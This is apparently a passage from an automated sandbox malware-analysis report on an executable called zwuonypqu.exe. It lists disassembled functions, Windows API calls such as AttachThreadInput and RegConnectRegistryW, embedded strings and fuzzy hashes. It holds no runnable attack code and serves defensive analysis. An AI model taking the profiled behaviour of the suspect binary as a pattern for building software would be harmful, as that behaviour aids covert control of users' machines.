                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$Window_wcscat_wcslen
                        • String ID: -----$SysListView32
                        • API String ID: 4008455318-3975388722
                        • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                        • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                        • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                        • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                        • String ID: 0
                        • API String ID: 176399719-4108050209
                        • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                        • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                        • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                        • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                        APIs
                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                        • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                        • GetDlgCtrlID.USER32 ref: 00469289
                        • GetParent.USER32 ref: 004692A4
                        • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                        • GetDlgCtrlID.USER32 ref: 004692AE
                        • GetParent.USER32 ref: 004692C7
                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$CtrlParent$_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 2040099840-1403004172
                        • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                        • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                        • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                        • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                        APIs
                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                        • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                        • GetDlgCtrlID.USER32 ref: 00469483
                        • GetParent.USER32 ref: 0046949E
                        • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                        • GetDlgCtrlID.USER32 ref: 004694A8
                        • GetParent.USER32 ref: 004694C1
                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$CtrlParent$_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 2040099840-1403004172
                        • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                        • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                        • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                        • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                        APIs
                          • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                        • SendMessageW.USER32(750A0E13,00001001,00000000,00000000), ref: 00448E73
                        • SendMessageW.USER32(750A0E13,00001026,00000000,00000000), ref: 00448E7E
                          • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$BrushCreateDeleteObjectSolid
                        • String ID:
                        • API String ID: 3771399671-0
                        • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                        • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                        • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                        • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: InitVariant$_malloc_wcscpy_wcslen
                        • String ID:
                        • API String ID: 3413494760-0
                        • Opcode ID: 3e576700eaa120b4cc2728f51a198fd447c15b227df8d5eef1ac6b7d3da7ef95
                        • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                        • Opcode Fuzzy Hash: 3e576700eaa120b4cc2728f51a198fd447c15b227df8d5eef1ac6b7d3da7ef95
                        • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                        APIs
                        • GetCurrentThreadId.KERNEL32(?,?,?,?,0045FDE0,?,?,00000001), ref: 004377D7
                        • GetForegroundWindow.USER32 ref: 004377EB
                        • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00437809
                        • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0043782E
                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0043783D
                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0043788D
                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004378A1
                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004378AC
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                        • String ID:
                        • API String ID: 2156557900-0
                        • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                        • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                        • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                        • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __wcsicoll
                        • String ID: 0%d$DOWN$OFF
                        • API String ID: 3832890014-468733193
                        • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                        • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                        • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                        • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                        APIs
                        • VariantInit.OLEAUT32(00000000), ref: 0045E959
                        • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                        • VariantClear.OLEAUT32 ref: 0045E970
                        • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                        • __swprintf.LIBCMT ref: 0045EB1F
                        • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                        • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                        Strings
                        • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                        • String ID: %4d%02d%02d%02d%02d%02d
                        • API String ID: 43541914-1568723262
                        • Opcode ID: 7b137d40a6d4d79aa700c245b17af4aec2984a8a4b7f4cdcd073246627ebccae
                        • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                        • Opcode Fuzzy Hash: 7b137d40a6d4d79aa700c245b17af4aec2984a8a4b7f4cdcd073246627ebccae
                        • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                        APIs
                        • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                        • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                        • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: DecrementInterlocked$Sleep
                        • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                        • API String ID: 2250217261-3412429629
                        • Opcode ID: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                        • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                        • Opcode Fuzzy Hash: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                        • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                        • API String ID: 0-1603158881
                        • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                        • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                        • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                        • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                        APIs
                        • _memset.LIBCMT ref: 00479D1F
                        • VariantInit.OLEAUT32(?), ref: 00479F06
                        • VariantClear.OLEAUT32(?), ref: 00479F11
                        • VariantInit.OLEAUT32(?), ref: 00479DF7
                          • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                          • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                          • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                        • VariantClear.OLEAUT32(?), ref: 00479F9C
                          • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                        • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                        • API String ID: 665237470-60002521
                        • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                        • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                        • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                        • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                        APIs
                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ConnectRegistry_wcslen
                        • String ID: HH
                        • API String ID: 535477410-2761332787
                        • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                        • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                        • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                        • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                        • String ID: 0$2
                        • API String ID: 3311875123-3793063076
                        • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                        • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                        • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                        • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe), ref: 0043719E
                        • LoadStringW.USER32(00000000), ref: 004371A7
                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                        • LoadStringW.USER32(00000000), ref: 004371C0
                        • _printf.LIBCMT ref: 004371EC
                        • MessageBoxW.USER32 ref: 00437208
                        Strings
                        • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                        • C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, xrefs: 00437189
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString$Message_printf
                        • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\AppData\Local\Temp\zwuonypqu.exe
                        • API String ID: 220974073-2222797236
                        • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                        • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                        • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                        • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                        • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                        • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                        • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                        APIs
                          • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,?,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,004A8E80,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,0040F3D2), ref: 0040FFCA
                          • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                        • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                        • MoveFileW.KERNEL32 ref: 0045358E
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: File$AttributesFullMoveNamePathlstrcmpi
                        • String ID:
                        • API String ID: 978794511-0
                        • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                        • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                        • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                        • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                        • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                        • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                        • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                        APIs
                        • GetWindowLongW.USER32(?,000000EC), ref: 00455F01
                        • _memset.LIBCMT ref: 00455F12
                        • SendMessageW.USER32 ref: 00455F43
                        • SendMessageW.USER32(?,0000104B,00000000,?), ref: 00455F82
                        • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00455FF5
                        • _wcslen.LIBCMT ref: 00455FFC
                        • _wcslen.LIBCMT ref: 00456018
